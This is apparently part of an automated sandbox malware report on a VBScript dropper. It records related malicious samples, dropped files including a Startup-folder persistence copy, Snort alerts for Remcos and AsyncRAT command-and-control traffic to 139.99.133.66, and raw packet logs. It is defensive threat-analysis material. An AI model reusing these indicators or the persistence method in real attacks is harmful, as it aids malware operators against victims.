              TcnD64eVFK.exeGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              DHL Express Courier Pickup Confirmation CBJ231025122456.exeGet hashmaliciousRemcosBrowse
              • 178.237.33.50

              ASNs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              OVHFRhttps://campaign-statistics.com/link_click/PJygYHTMZ2_OXDfP/30633247af9f78d20f1e067eab9a8276Get hashmaliciousHTMLPhisherBrowse
              • 91.134.146.191
              https://i.imgur.com/VlAllek.pngGet hashmaliciousUnknownBrowse
              • 51.79.152.81
              BM-FM_NR.24040718PDF.exeGet hashmaliciousFormBook, GuLoaderBrowse
              • 51.77.215.151
              ProSheets.msiGet hashmaliciousUnknownBrowse
              • 217.182.69.200
              bomgar-scc-w0eec30gdg6gx6wy8y6j8ddehxi7i1x5fwfex5jc40jc90.exeGet hashmaliciousUnknownBrowse
              • 54.38.11.197
              bomgar-scc-w0eec30gdg6gx6wy8y6j8ddehxi7i1x5fwfex5jc40jc90.exeGet hashmaliciousUnknownBrowse
              • 54.38.11.197
              v2cDqXmZtv.elfGet hashmaliciousMiraiBrowse
              • 51.79.217.59
              Wd2T9v9ZMT.elfGet hashmaliciousMiraiBrowse
              • 51.79.217.59
              7T1vOaCJto.elfGet hashmaliciousMiraiBrowse
              • 51.79.217.59
              Price request N#U00b0DEM23000199.jsGet hashmaliciousAsyncRAT, PureLog Stealer, RedLineBrowse
              • 51.254.27.105
              ATOM86-ASATOM86NLUrgenteNotificationRef.cmdGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              107. PN-EN-1090-2+A1_2012P.exeGet hashmaliciousGuLoader, RemcosBrowse
              • 178.237.33.50
              URGENTE_NOTIFICATION.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
              • 178.237.33.50
              OKhCyJ619J.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
              • 178.237.33.50
              fu56fbrtn8.exeGet hashmaliciousRemcos, DBatLoaderBrowse
              • 178.237.33.50
              1713934625194381993b7036c2f81df0c4f94527f4e7bb43abdf90d09e24f7ee13cf33c8d8678.dat-decoded.exeGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeGet hashmaliciousGuLoader, RemcosBrowse
              • 178.237.33.50
              TcnD64eVFK.exeGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              DHL Express Courier Pickup Confirmation CBJ231025122456.exeGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              Quotation.xlsGet hashmaliciousRemcosBrowse
              • 178.237.33.50

              JA3 Fingerprints

              No context

              Dropped Files

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              C:\Users\user\AppData\Local\Temp\dynwrapx.dll46727395.jsGet hashmaliciousUnknownBrowse
                16459.lnkGet hashmaliciousUnknownBrowse
                  2992a904c27bef67021222fbd4ae003f6fb73a9786f62185cee7de32.vbsGet hashmaliciousDarkMeBrowse
                    e97d83285b04e23856ae52ef9b7c0563c7125b0a10465642583f6f03.vbsGet hashmaliciousNjratBrowse
                      c19a883a77b885b04554f980fc0f3df6eea9adc3ea2a84db4ef8d6b7.vbsGet hashmaliciousUnknownBrowse
                        2425252246__booking_reservation_.vbsGet hashmaliciousRemcosBrowse
                          PDF_Curriculum_Vitae.vbsGet hashmaliciousRemcosBrowse
                            Curriculum_Vitae_Yaquelin_Diaz_pdf_.vbsGet hashmaliciousUnknownBrowse
                              PDF_CONSULTAR_PAGO_[9644112]..vbsGet hashmaliciousRemcosBrowse
                                PDF_CV_Mia_Fisher.vbsGet hashmaliciousAsyncRAT, DcRatBrowse

                                  Created / dropped Files

                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                  Download File
                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                  Category:dropped
                                  Size (bytes):69993
                                  Entropy (8bit):7.99584879649948
                                  Encrypted:true
                                  SSDEEP:1536:iMveRG6BWC7T2g1wGUa5QUoaIB9ttiFJG+AOQOXl0Usvwr:feRG6BX6gUaHo9tkBHiUewr
                                  MD5:29F65BA8E88C063813CC50A4EA544E93
                                  SHA1:05A7040D5C127E68C25D81CC51271FFB8BEF3568
                                  SHA-256:1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
                                  SHA-512:E29B2E92C496245BED3372578074407E8EF8882906CE10C35B3C8DEEBFEFE01B5FD7F3030ACAA693E175F4B7ACA6CD7D8D10AE1C731B09C5FA19035E005DE3AA
                                  Malicious:false
                                  Preview:MSCF....i.......,...................I.................oXAy .authroot.stl.Ez..Q6..CK..<Tk...p.k..1...3...[..%Y.f..."K.6)..[*I.hOB."..rK.RQ*..}f..f...}....9.|.....gA...30.,O2L...0..%.U...U.t.....`dqM2.x..t...<(uad.c...x5V.x..t..agd.v......i...KD..q(. ...JJ......#..'=. ...3.x...}...+T.K..!.'.`w .!.x.r.......YafhG..O.3....'P[..'.D../....n..t....R<..=\E7L0?{..T.f...ID...,...r....3z..O/.b.Iwx.. .o...a\.s........."..'.......<;s.[...l...6.)ll..B.P.....k.... k0.".t!/.,........{...P8....B..0(.. .Q.....d...q,\.$.n.Q.\.p...R..:.hr./..8.S<a.s...+#3....D..h1.a.0....{.9.....:e.......n.~G.{.M.1..OU.....B.Q..y_>.P{...}i.=.a..QQT.U..|!.pyCD@.....l..70..w..)...W^.`l...%Y.\................i..=hYV.O8W@P.=.r.=..1m..1....)\.p..|.c.3..t..[...).....l.{.Y....\S.....y....[.mCt....Js;...H....Q..F.....g.O...[..A.=...F[..z....k...mo.lW{`....O...T.g.Y.Uh.;m.'.N..f..}4..9i..t4p_bI..`.....Ie..l.P.... ...Lg......[....5g...~D.s.h'>n.m.c.7...-..P.gG...i$...v.m.b[.yO.P/*.YH.

                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                  Download File
                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):330
                                  Entropy (8bit):3.1354334016381724
                                  Encrypted:false
                                  SSDEEP:6:kKKzqlDN+SkQlPlEGYRMY9z+4KlDA3RUeVlWI/Vt:QqlMkPlE99SNxAhUeVLVt
                                  MD5:78962DA4ACFB601EE169040831DA0FC9
                                  SHA1:FE94CB3CCC97CEFB6ECF209083EFE2C05206AD94
                                  SHA-256:1385A4D70153E6B5A6054BAD5F7CD0DE25CBB003DADDB3F71480BEB118AB0437
                                  SHA-512:51D059A723C3A2B6D3F03A0C37609CDACE4C7AF016AF0AD456FF679D926FF232D39E4424227E8FE55014EDF2D39A296D70DFAE090DD92C515981CDAFD6EC52A5
                                  Malicious:false
                                  Preview:p...... .........6f.X...(....................................................... ........M.........(...........i...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".b.3.6.8.5.3.8.5.a.4.7.f.d.a.1.:.0."...

                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log

                                  Download File
                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  File Type:CSV text
                                  Category:dropped
                                  Size (bytes):425
                                  Entropy (8bit):5.353683843266035
                                  Encrypted:false
                                  SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                  MD5:859802284B12C59DDBB85B0AC64C08F0
                                  SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                  SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                  SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                  Malicious:false
                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\json[1].json

                                  Download File
                                  Process:C:\Windows\winhlp32.exe
                                  File Type:JSON data
                                  Category:dropped
                                  Size (bytes):965
                                  Entropy (8bit):5.0061630437862155
                                  Encrypted:false
                                  SSDEEP:12:tkbOnd6UGkMyGWKyGXPVGArwY3o/IomaoHNmGNArpv/mOAaNO+ao9W7iN5zzkw7T:qbCdVauKyGX85jrvXhNlT3/7sYDsro
                                  MD5:664DA71A99A7A7C426134240B73EF767
                                  SHA1:33EAC84BB6B07F00593F05413A64CD8738B8A6E7
                                  SHA-256:146F13F7649B0BB05ECAA2386D7E8DC23E5BA7B69A36919E17E994E63E9F7BA5
                                  SHA-512:DCA9DC8FE7ED040B134D138846C0F3BA940DBCBE9883E19E704D06B8CA737E3FE4EE08AC5F98814E804E7D7716B580FBC4F7971AAD9DDC3887565FD07C4C674D
                                  Malicious:false
                                  Preview:{. "geoplugin_request":"154.16.105.36",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Las Vegas",. "geoplugin_region":"Nevada",. "geoplugin_regionCode":"NV",. "geoplugin_regionName":"Nevada",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"839",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"36.1685",. "geoplugin_longitude":"-115.1164",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Los_Angeles",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Download File
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):1216
                                  Entropy (8bit):5.383195573997631
                                  Encrypted:false
                                  SSDEEP:24:3pytZWSKco4KmBs4RPT6BmFoUebIlmjKcmZ9tXt/NK3R8e9rq:ZyjWSU4y4RQmFoUeUmfmZ9tlNWR82m
                                  MD5:BCAC66526576FEC3D50B40E872EA098F
                                  SHA1:6982643A88C2C79B00A807737E52D621728361A0
                                  SHA-256:269948B6F8E059FE396D26C5972DDB2DFD2A2678D6B179635118613172BF6F52
                                  SHA-512:196BAE8B49AE92DC5409075AE0EFF7F77C7A5631DA965C72D92B2CCF0CD54266C45EB23AA1908BAE82880CE54347E7081C41845F64AD6922317500003F949BC8
                                  Malicious:false
                                  Preview:@...e.................................^..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4u52a2hn.z2m.ps1

                                  Download File
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_idwwmmc2.d30.psm1

                                  Download File
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\dynwrapx.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\wscript.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):13312
                                  Entropy (8bit):5.361023027635644
                                  Encrypted:false
                                  SSDEEP:192:zw6pqzIbezCj4Wz6KxpEibQiadLAGEZr8k4e2bC74gVvaAUW:z9lbbkWzXEibQifOk4e2bC74YvaW
                                  MD5:E0B8DFD17B8E7DE760B273D18E58B142
                                  SHA1:801509FB6783C9E57EDC67A72DDE3C62080FFBAF
                                  SHA-256:4EF3A6703ABC6B2B8E2CAC3031C1E5B86FE8B377FDE92737349EE52BD2604379
                                  SHA-512:443359DA27B3C87E81AE4F4B9A2AB7E7BF6ABFA93551FC62347A0B79B36D79635131ABC14D4DEDDAB3ACE12FDF973496518F67E1BE8DC4903B35FD465835556B
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 46%
                                  Joe Sandbox View:
                                  • Filename: 46727395.js, Detection: malicious, Browse
                                  • Filename: 16459.lnk, Detection: malicious, Browse
                                  • Filename: 2992a904c27bef67021222fbd4ae003f6fb73a9786f62185cee7de32.vbs, Detection: malicious, Browse
                                  • Filename: e97d83285b04e23856ae52ef9b7c0563c7125b0a10465642583f6f03.vbs, Detection: malicious, Browse
                                  • Filename: c19a883a77b885b04554f980fc0f3df6eea9adc3ea2a84db4ef8d6b7.vbs, Detection: malicious, Browse
                                  • Filename: 2425252246__booking_reservation_.vbs, Detection: malicious, Browse
                                  • Filename: PDF_Curriculum_Vitae.vbs, Detection: malicious, Browse
                                  • Filename: Curriculum_Vitae_Yaquelin_Diaz_pdf_.vbs, Detection: malicious, Browse
                                  • Filename: PDF_CONSULTAR_PAGO_[9644112]..vbs, Detection: malicious, Browse
                                  • Filename: PDF_CV_Mia_Fisher.vbs, Detection: malicious, Browse
                                  Preview:MZl.....................@.......Win32 Program!..$......!.L.!`...GoLink, GoAsm www.GoDevTool.com.PE..L...5u.H...........!...&.....................0.......................................................................p.......`..d....P...............................................................................`..h...........................code....p........................... ..`data....P....0......................@...const........@......................@..@.rsrc........P.......&..............@..@.idata..b....`.......*.............. ..`.edata.......p......................@..@.reloc...............0..............@..B........................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\remc1.vbs

                                  Download File
                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  File Type:Unicode text, UTF-8 text, with very long lines (30665), with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):1153053
                                  Entropy (8bit):4.2877223818176775
                                  Encrypted:false
                                  SSDEEP:12288:NSTVA+kRl0fK01sQI/2Y9F+Rd+eonsb5dejOUBMgeGbAXONwmw5qgGyI62OTJeeS:MT2++udrIs+F
                                  MD5:9317AB6C1740DC1F1384918831F8D0DC
                                  SHA1:07466682ED2D7EAD1A1570CE604E388F9CBB5E5C
                                  SHA-256:53A52E986540D9A13F7E1166D61DE49880E3B7B9AC5A32AB5B80D5F92D515B23
                                  SHA-512:FD047BB307AE29B924C8139A03C44BF23277D95847EF15BC97B9096B51EA3F1921DED9427AE86D71B19D249E3DB152FF7CABCE2B95AAB038E3AEE548531C9CD7
                                  Malicious:true
                                  Preview:'' SIG '' Begin signature block..' L_optListTkaCerts = "ltc"..' L_ParamsActIDOptional = "[Activation ID | All]"'' SIG '' Begin signature block..' L_optListTkaCerts = "ltc"..' L_optListTkaCertsUsage = "List Token-based Activation Certificates"....' L_optForceTkaActivation = "fta"..' L_optForceTkaActivationUsage = "Force Token-based 444Activatio44n"......' L_optADActivate = "ad-activation-o33nline"..' L_optADActivateUsage = "Activate AD (Active Directory) forest with user-provided product key"....' L_optADGetIID = "ad-activatio444n-get-iid"..' L_optADGetIIDUsage = "Display Installation ID for AD (Active Directory) forest"....' L_optADApplyCID = "ad-activation-apply-cid"..' L_optADApplyCIDUsage = "Acti44444444444444444vate AD (Active Directory) forest wi

                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\remc1.vbs

                                  Download File
                                  Process:C:\Windows\SysWOW64\wscript.exe
                                  File Type:Unicode text, UTF-8 text, with very long lines (30665), with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):1153053
                                  Entropy (8bit):4.2877223818176775
                                  Encrypted:false
                                  SSDEEP:12288:NSTVA+kRl0fK01sQI/2Y9F+Rd+eonsb5dejOUBMgeGbAXONwmw5qgGyI62OTJeeS:MT2++udrIs+F
                                  MD5:9317AB6C1740DC1F1384918831F8D0DC
                                  SHA1:07466682ED2D7EAD1A1570CE604E388F9CBB5E5C
                                  SHA-256:53A52E986540D9A13F7E1166D61DE49880E3B7B9AC5A32AB5B80D5F92D515B23
                                  SHA-512:FD047BB307AE29B924C8139A03C44BF23277D95847EF15BC97B9096B51EA3F1921DED9427AE86D71B19D249E3DB152FF7CABCE2B95AAB038E3AEE548531C9CD7
                                  Malicious:true
                                  Preview:'' SIG '' Begin signature block..' L_optListTkaCerts = "ltc"..' L_ParamsActIDOptional = "[Activation ID | All]"'' SIG '' Begin signature block..' L_optListTkaCerts = "ltc"..' L_optListTkaCertsUsage = "List Token-based Activation Certificates"....' L_optForceTkaActivation = "fta"..' L_optForceTkaActivationUsage = "Force Token-based 444Activatio44n"......' L_optADActivate = "ad-activation-o33nline"..' L_optADActivateUsage = "Activate AD (Active Directory) forest with user-provided product key"....' L_optADGetIID = "ad-activatio444n-get-iid"..' L_optADGetIIDUsage = "Display Installation ID for AD (Active Directory) forest"....' L_optADApplyCID = "ad-activation-apply-cid"..' L_optADApplyCIDUsage = "Acti44444444444444444vate AD (Active Directory) forest wi

                                  Static File Info

                                  General

                                  File type:Unicode text, UTF-8 text, with very long lines (59814), with CRLF line terminators
                                  Entropy (8bit):4.899906192188333
                                  TrID:
                                  • Visual Basic Script (13500/0) 100.00%
                                  File name:lmg1_Mlakaifa443456.vbs
                                  File size:233'061 bytes
                                  MD5:ade48125e600ea0434a894e7c5131462
                                  SHA1:8b5e29fc3d490ebcba5295332c601d8165a67ec5
                                  SHA256:2f7971748b7db79bdd724861d1b463b0489b790b9e60e733dea409f73abf9539
                                  SHA512:f0fd0cb6486a79fd11a245900df0cbae4166895fd057847c3e0fa6feacc21fdfc3bbb334e7241e5d0f9474b83e93866cf6207e002301a7546e04cef7b2d04fd6
                                  SSDEEP:3072:W0k79DqcN+xqgRPB5jzeTMJNHEPenFkCum03pvfpp03pp03pp03pA:jk79DqcgxqgRPBJeQJhEPeQr5
                                  TLSH:DC348371A247553943D203AF9E0E482E93363512FFA79728378CA1C45F62799E1B2E4F
                                  File Content Preview:........'..'..'....const kActionUnknown = 0..const kActionPause = 1..const kActionResume = 2..const kActionCancel = 3..const kActionList = 4....const kErrorSuccess = 0..const KErrorFailure = 1....const kNameSpace = "ro

                                  File Icon

                                  Icon Hash:68d69b8f86ab9a86

                                  Network Behavior

                                  Snort IDS Alerts

                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                  04/24/24-17:04:24.767265TCP2032777ET TROJAN Remcos 3.x Unencrypted Server Response444449715139.99.133.66192.168.2.5
                                  04/24/24-17:04:24.390969TCP2032776ET TROJAN Remcos 3.x Unencrypted Checkin497154444192.168.2.5139.99.133.66
                                  04/24/24-17:04:03.847489TCP2848152ETPRO TROJAN Observed Malicious SSL Cert (AsyncRAT Variant)666649704139.99.133.66192.168.2.5

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Apr 24, 2024 17:04:03.111262083 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:03.472683907 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:03.472836971 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:03.483046055 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:03.847489119 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:03.853661060 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:04.219938993 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:04.340313911 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:05.287650108 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:05.700994968 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:05.701056957 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:06.105362892 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:09.280117035 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:09.280622959 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:09.280698061 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:09.280803919 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:09.280822992 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:09.280841112 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:09.280860901 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:09.280873060 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:09.280878067 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:09.280888081 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:09.280905008 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:09.280920982 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:09.280941010 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:09.280946970 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:09.280972004 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:09.329175949 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:09.643640995 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:09.643703938 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:09.643745899 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:09.643785000 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:09.643824100 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:09.643826008 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:09.643861055 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:09.643879890 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:09.643899918 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:09.643922091 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:09.643943071 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:09.644009113 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:09.644035101 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:09.644073009 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:09.644135952 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:09.644172907 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:09.644210100 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:09.644268036 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:09.644490004 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:09.644527912 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:09.644579887 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:09.644750118 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:09.645096064 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:09.645136118 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:09.645152092 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:09.645174980 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:09.645220995 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:09.690346003 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:09.690484047 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:09.690555096 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.006705999 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.006769896 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.006808043 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.006833076 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.006845951 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.006891012 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.006927013 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.006982088 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.007019043 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.007026911 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.007087946 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.007126093 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.007136106 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.007164001 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.007201910 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.007206917 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.007303953 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.007353067 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.007389069 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.007458925 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.007497072 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.007505894 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.007601023 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.007656097 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.007658005 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.007698059 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.007735968 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.007744074 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:10.007774115 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:10.007821083 CEST497046666192.168.2.5139.99.133.66
